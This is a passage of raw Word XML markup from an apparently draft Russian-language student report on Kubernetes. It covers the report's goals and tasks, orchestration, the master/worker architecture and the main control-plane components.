            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Б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_Toc231834659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73EA7974" w14:textId="19B2A380" w:rsidR="00063C8F" w:rsidRDefault="00BA1F4F" w:rsidP="00BA1F4F">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9356"/>
        </w:tabs>
        <w:sectPr w:rsidR="00063C8F" w:rsidSect="00E66CD9">
          <w:headerReference w:type="default" r:id="rId11"/>
          <w:pgSz w:w="11906" w:h="16838" w:code="9"/>
          <w:pgMar w:top="1134" w:right="567" w:bottom="1134" w:left="1134" w:header="709" w:footer="680" w:gutter="0"/>
          <w:cols w:space="708"/>
          <w:docGrid w:linePitch="381"/>
        </w:sectPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DF45AB8" w14:textId="77777777" w:rsidR="00063C8F" w:rsidRDefault="00063C8F" w:rsidP="00403A26">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc518292916"/>
      <w:bookmarkStart w:id="2" w:name="_Toc231834629"/>
      <w:r w:rsidRPr="00956819">
        <w:lastRenderedPageBreak/>
        <w:t>ВВЕДЕНИЕ</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="510C36E7" w14:textId="77777777" w:rsidR="00403A26" w:rsidRPr="00403A26" w:rsidRDefault="00403A26" w:rsidP="00403A26"/>
    <w:p w14:paraId="0A6CFC01" w14:textId="4D3C3CE1" w:rsidR="003C7EF7" w:rsidRPr="00403A26" w:rsidRDefault="00403A26" w:rsidP="00403A26">
      <w:pPr>
        <w:pStyle w:val="Beginingtitlelist"/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc231073600"/>
      <w:bookmarkStart w:id="4" w:name="_Toc231774162"/>
      <w:bookmarkStart w:id="5" w:name="_Toc231834630"/>
      <w:r w:rsidRPr="00403A26">
        <w:t>Цель работы</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
      <w:bookmarkEnd w:id="4"/>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="047EB28B" w14:textId="77777777" w:rsidR="00A60D3C" w:rsidRDefault="003C7EF7" w:rsidP="00A60D3C">
      <w:r>
        <w:t xml:space="preserve">Исследовать программное обеспечение </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Kubernetes</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7EF7">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:t>рассмотреть его архитектуру, основные компоненты, преимущества и недостатки, исследовать альтернативные решения</w:t>
      </w:r>
      <w:r w:rsidR="00690FD3">
        <w:t>, а также изучить вопросы безопасности оркестровки на примере исправленной уязвимости.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09D55013" w14:textId="77777777" w:rsidR="00A60D3C" w:rsidRDefault="00A60D3C" w:rsidP="00403A26">
      <w:pPr>
        <w:pStyle w:val="Beginingtitlelist"/>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc231073601"/>
      <w:bookmarkStart w:id="7" w:name="_Toc231774163"/>
      <w:bookmarkStart w:id="8" w:name="_Toc231834631"/>
      <w:r>
        <w:t>Актуальность темы.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
      <w:bookmarkEnd w:id="7"/>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w14:paraId="0564331D" w14:textId="77777777" w:rsidR="00A60D3C" w:rsidRPr="008572EA" w:rsidRDefault="00A60D3C" w:rsidP="00A60D3C">
      <w:r>
        <w:t xml:space="preserve">В связи с трендом перехода от монолитной архитектуры к микросервисной и ростом популяронсти контейнеров, появился спрос на оркестровщики, которые дают функционал для управления большим числом независимых </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>docker</w:t>
      </w:r>
      <w:r w:rsidRPr="00A60D3C">
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">контейнеров. Самым популярным средством оркестровки контейнеров является </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Kubernetes</w:t>
      </w:r>
      <w:r w:rsidRPr="008572EA">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26468A37" w14:textId="77777777" w:rsidR="009618D3" w:rsidRDefault="00A60D3C" w:rsidP="00A60D3C">
      <w:r>
        <w:t xml:space="preserve">С точки зрения безопасности, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Kubernetes</w:t>
      </w:r>
      <w:r w:rsidRPr="00A60D3C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">позволяет централизованно управлять защитой </w:t>
      </w:r>
      <w:r w:rsidR="008475BE">
        <w:t xml:space="preserve">независимых контейнеров. Также </w:t>
      </w:r>
      <w:r w:rsidR="008475BE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Kubernetes</w:t>
      </w:r>
      <w:r w:rsidR="008475BE" w:rsidRPr="008475BE">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008475BE">
        <w:t>имеет изолированные компоненты, например для взаимодействий между контейнерами и хранения конфиденциальной информации.</w:t>
      </w:r>
      <w:r w:rsidR="008475BE" w:rsidRPr="008475BE">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008475BE">
        <w:t xml:space="preserve">Так как компоненты </w:t>
      </w:r>
      <w:r w:rsidR="008475BE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Kubernetes </w:t>
      </w:r>
      <w:r w:rsidR="008475BE">
        <w:t xml:space="preserve">имеют строгую спецификацию, то </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19D7FB4B" w14:textId="77777777" w:rsidR="009618D3" w:rsidRDefault="009618D3" w:rsidP="00403A26">
      <w:pPr>
        <w:pStyle w:val="Beginingtitlelist"/>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc231073602"/>
      <w:bookmarkStart w:id="10" w:name="_Toc231774164"/>
      <w:bookmarkStart w:id="11" w:name="_Toc231834632"/>
      <w:r>
        <w:t>Задачи</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
      <w:bookmarkEnd w:id="10"/>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w14:paraId="3729808E" w14:textId="0DAD324F" w:rsidR="009618D3" w:rsidRDefault="009618D3" w:rsidP="009618D3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Рассмотреть понятие </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Kubernetes</w:t>
      </w:r>
      <w:r w:rsidRPr="009618D3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>и назначение оркестровки;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A945818" w14:textId="3DB7A5A7" w:rsidR="009618D3" w:rsidRDefault="009618D3" w:rsidP="009618D3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">изучить архитектуру </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Kubernetes</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> и его основные компоненты;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="766C9103" w14:textId="312C4721" w:rsidR="009618D3" w:rsidRPr="009618D3" w:rsidRDefault="009618D3" w:rsidP="009618D3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">определить преимущества и недостатки </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Kubernetes</w:t>
      </w:r>
      <w:r w:rsidRPr="009618D3">
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D82BE7A" w14:textId="0DCC3D14" w:rsidR="009618D3" w:rsidRPr="009618D3" w:rsidRDefault="009618D3" w:rsidP="009618D3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">рассмотреть аналоги </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Kubernetes;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A3071F8" w14:textId="2C4CA0B0" w:rsidR="009618D3" w:rsidRDefault="009618D3" w:rsidP="009618D3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>изучить основные принципы и вопросы безопасности в оркестровке контейнеров.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FA5F174" w14:textId="737CE324" w:rsidR="009618D3" w:rsidRDefault="009618D3" w:rsidP="009618D3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">исследовать </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CVE</w:t>
      </w:r>
      <w:r w:rsidRPr="009618D3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">для </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Kubernetes</w:t>
      </w:r>
      <w:r w:rsidRPr="009618D3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">и </w:t>
      </w:r>
      <w:r w:rsidR="005306E7">
        <w:t>продемонстрировать уязвимость;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65BD921E" w14:textId="35F11EB4" w:rsidR="005306E7" w:rsidRPr="009618D3" w:rsidRDefault="005306E7" w:rsidP="009618D3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>рассмотреть методы исправления уязвимости и обновленные средства защиты.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CCCFC9C" w14:textId="0FC95A28" w:rsidR="00370CBF" w:rsidRPr="00B0588B" w:rsidRDefault="00370CBF" w:rsidP="009618D3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D1D209F" w14:textId="104C3939" w:rsidR="00F87163" w:rsidRPr="00403A26" w:rsidRDefault="005306E7" w:rsidP="00403A26">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc231834633"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>ТЕОРЕТИЧЕСКИЕ ИССЛЕДОВАНИЯ</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p w14:paraId="71794D60" w14:textId="45F9E98F" w:rsidR="00635E67" w:rsidRPr="00956819" w:rsidRDefault="005306E7" w:rsidP="005306E7">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Toc231834634"/>
      <w:r>
        <w:t>П</w:t>
      </w:r>
      <w:r w:rsidR="00015840">
        <w:t>оня</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">тие </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>kuberntets</w:t>
      </w:r>
      <w:r w:rsidRPr="005306E7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>и назначение оркестровки</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w14:paraId="78BAE74E" w14:textId="1BD95C3E" w:rsidR="005306E7" w:rsidRPr="008572EA" w:rsidRDefault="005306E7" w:rsidP="005306E7">
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Kubernetes</w:t>
      </w:r>
      <w:r w:rsidRPr="005306E7">
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">программное обеспечение для оркестровки контейнеризированных приложения и автоматизации их развертывания. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Kubernetes</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> позволяет удобно масштабировать инфраструктуру и предоставляет управление контейнерами через различные компоненты. Это предоставляет удобный контроль всей инфраструктуры приложений и является основой для построение системы микросервисов, тренд на которые набирает огромную популярность. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AE5BA33" w14:textId="5213FFEB" w:rsidR="008572EA" w:rsidRDefault="008572EA" w:rsidP="005306E7">
      <w:r>
        <w:t xml:space="preserve">Использование самих контейнеров дает возможность запускать приложения в изолированных средах со вссеми необходимыми зависимостями. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Kubernetes</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="008572EA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">в свою очередь, собирает все контейнеры приложений в единый кластер. Компоненты </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Kubernetes</w:t>
      </w:r>
      <w:r w:rsidRPr="008572EA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>дают возможность гибкого управления над кластером, что повышает отказоустойчивость системы.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12AB7CF1" w14:textId="058540FF" w:rsidR="008572EA" w:rsidRDefault="008572EA" w:rsidP="005306E7">
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Kubernetes</w:t>
      </w:r>
      <w:r w:rsidRPr="008572EA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">применяется для развертывания приложений, их масштабирования, контроля нагрузки на инфраструктуру, управления ресурсами, а также оркестрации системы контейнеров приложений. Основное преимущество </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Kubernetes</w:t>
      </w:r>
      <w:r w:rsidRPr="008572EA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>заключается в систематизировании инфраструктуры проекта, а также предосавлении гибкого контроля и настройки системы и ее простого масштабирования.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64013B56" w14:textId="25DB5413" w:rsidR="00403A26" w:rsidRDefault="00403A26" w:rsidP="00403A26">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Toc231834635"/>
      <w:r>
        <w:t xml:space="preserve">архитектура </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Kubernetes</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:p w14:paraId="1FB94A5F" w14:textId="5911D0EC" w:rsidR="006757AF" w:rsidRDefault="00403A26" w:rsidP="006757AF">
      <w:r>
        <w:t xml:space="preserve">Архитекрута </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Kubernetes</w:t>
      </w:r>
      <w:r w:rsidRPr="00403A26">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>построена по принципу мастер-узел, в которой присутствует главная нода</w:t>
      </w:r>
      <w:r w:rsidR="006757AF">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:t>а также рабочие ноды</w:t>
      </w:r>
      <w:r w:rsidR="006757AF">
        <w:t xml:space="preserve">, которые регулируются с помощью компонент контроля </w:t>
      </w:r>
      <w:r w:rsidR="006757AF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Kubernetes</w:t>
      </w:r>
      <w:r w:rsidR="006757AF" w:rsidRPr="006757AF">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="006757AF">
        <w:t xml:space="preserve"> Каждая нода представляет собой виртуальную или физическую машину.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="791E9452" w14:textId="2AEA71B2" w:rsidR="007D296C" w:rsidRDefault="00FC006D" w:rsidP="006757AF">
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Control</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC006D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Plane</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC006D">
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Главная нода) – объект </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Kubernetes</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC006D">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:t>управляющая поведением всего кластера, а также позволяет контроллировать рабочие ноды и связи между ними</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F92960A" w14:textId="2B4DB73D" w:rsidR="00FC006D" w:rsidRPr="00FC006D" w:rsidRDefault="00FC006D" w:rsidP="00FC006D">
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Worker</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC006D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Nodes</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC006D">
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Рабочие ноды) – объект </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Kubernetes</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC006D">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="000E24EE">
        <w:t>запускающий контейнеры для определенного приложения.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A343567" w14:textId="77777777" w:rsidR="007D296C" w:rsidRPr="006757AF" w:rsidRDefault="007D296C" w:rsidP="006757AF"/>
    <w:p w14:paraId="3535994B" w14:textId="77777777" w:rsidR="00162937" w:rsidRPr="007D296C" w:rsidRDefault="00162937" w:rsidP="00162937"/>
    <w:p w14:paraId="3206DD51" w14:textId="77777777" w:rsidR="005306E7" w:rsidRPr="00EF246D" w:rsidRDefault="005306E7" w:rsidP="005306E7"/>
    <w:p w14:paraId="5FCA83F9" w14:textId="77777777" w:rsidR="005306E7" w:rsidRPr="00EF246D" w:rsidRDefault="005306E7" w:rsidP="005306E7"/>
    <w:p w14:paraId="6927BA06" w14:textId="77777777" w:rsidR="005306E7" w:rsidRPr="00EF246D" w:rsidRDefault="005306E7" w:rsidP="005306E7"/>
    <w:p w14:paraId="25908A29" w14:textId="77777777" w:rsidR="005306E7" w:rsidRPr="00EF246D" w:rsidRDefault="005306E7" w:rsidP="005306E7"/>
    <w:p w14:paraId="254E2CA9" w14:textId="77777777" w:rsidR="0025460D" w:rsidRPr="0025460D" w:rsidRDefault="0025460D" w:rsidP="009621CF"/>
    <w:p w14:paraId="43141228" w14:textId="3CBA239A" w:rsidR="007F409D" w:rsidRDefault="00611481" w:rsidP="00403A26">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="_Toc231834636"/>
      <w:r>
        <w:t xml:space="preserve">Основные компоненты </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Kubernetes</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p w14:paraId="112B0316" w14:textId="70E2FAC5" w:rsidR="007D296C" w:rsidRPr="007D296C" w:rsidRDefault="007D296C" w:rsidP="007D296C">
      <w:r>
        <w:t xml:space="preserve">К основным компонентам </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Kubernetes</w:t>
      </w:r>
      <w:r w:rsidRPr="007D296C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">относят, главную ноду, рабочую ноду, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Pod</w:t>
      </w:r>
      <w:r w:rsidRPr="007D296C">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Service</w:t>
      </w:r>
      <w:r w:rsidRPr="007D296C">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Ingress</w:t>
      </w:r>
      <w:r w:rsidRPr="007D296C">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ConfigMap</w:t>
      </w:r>
      <w:r w:rsidRPr="007D296C">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Secret</w:t>
      </w:r>
      <w:r w:rsidRPr="007D296C">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Volume</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EB0757E" w14:textId="77777777" w:rsidR="007D296C" w:rsidRPr="006757AF" w:rsidRDefault="007D296C" w:rsidP="007D296C">
      <w:pPr>
        <w:pStyle w:val="Beginingtitlelist"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:ind w:left="1571"/>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="_Toc231073607"/>
      <w:bookmarkStart w:id="17" w:name="_Toc231774169"/>
      <w:bookmarkStart w:id="18" w:name="_Toc231834637"/>
      <w:r>
        <w:t>Главная нода</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
      <w:bookmarkEnd w:id="17"/>
      <w:bookmarkEnd w:id="18"/>
    </w:p>
    <w:p w14:paraId="72983604" w14:textId="77777777" w:rsidR="007D296C" w:rsidRDefault="007D296C" w:rsidP="007D296C">
      <w:r>
        <w:t xml:space="preserve">Главная нода – центральный узел рабочего кластера </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Kubernetes</w:t>
      </w:r>
      <w:r w:rsidRPr="00893942">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:t>который отвечает за взаимодействия рабочих нод с сервером, планировку контейнеров, логирование рабочих нод, а также резервного хранения данных.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="545D3016" w14:textId="77777777" w:rsidR="007D296C" w:rsidRDefault="007D296C" w:rsidP="007D296C">
      <w:r>
        <w:t xml:space="preserve"> Основные компоненты главной ноды:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="160AA6EB" w14:textId="77777777" w:rsidR="007D296C" w:rsidRDefault="007D296C" w:rsidP="007D296C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF246D">
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">контейнер с окружением кластера </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>K</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF246D">
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidRPr="00554039">
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31B24091" w14:textId="77777777" w:rsidR="007D296C" w:rsidRDefault="007D296C" w:rsidP="007D296C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Controller</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF246D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>manager</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF246D">
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r>
        <w:t>контейнер</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF246D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>с</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF246D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>таймлайном</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF246D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>работы кластера</w:t>
      </w:r>
      <w:r w:rsidRPr="00554039">
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E63C130" w14:textId="77777777" w:rsidR="007D296C" w:rsidRDefault="007D296C" w:rsidP="007D296C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Scheduler</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF246D">
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r>
        <w:t>контейнер-планировщик, определяющий рабочую ноду для запуска контейнера</w:t>
      </w:r>
      <w:r w:rsidRPr="00554039">
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73F6FEFD" w14:textId="77777777" w:rsidR="007D296C" w:rsidRPr="00EF246D" w:rsidRDefault="007D296C" w:rsidP="007D296C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ETCD –</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> резервное хранилище кластера.</w:t>
      </w:r>
    </w:p>
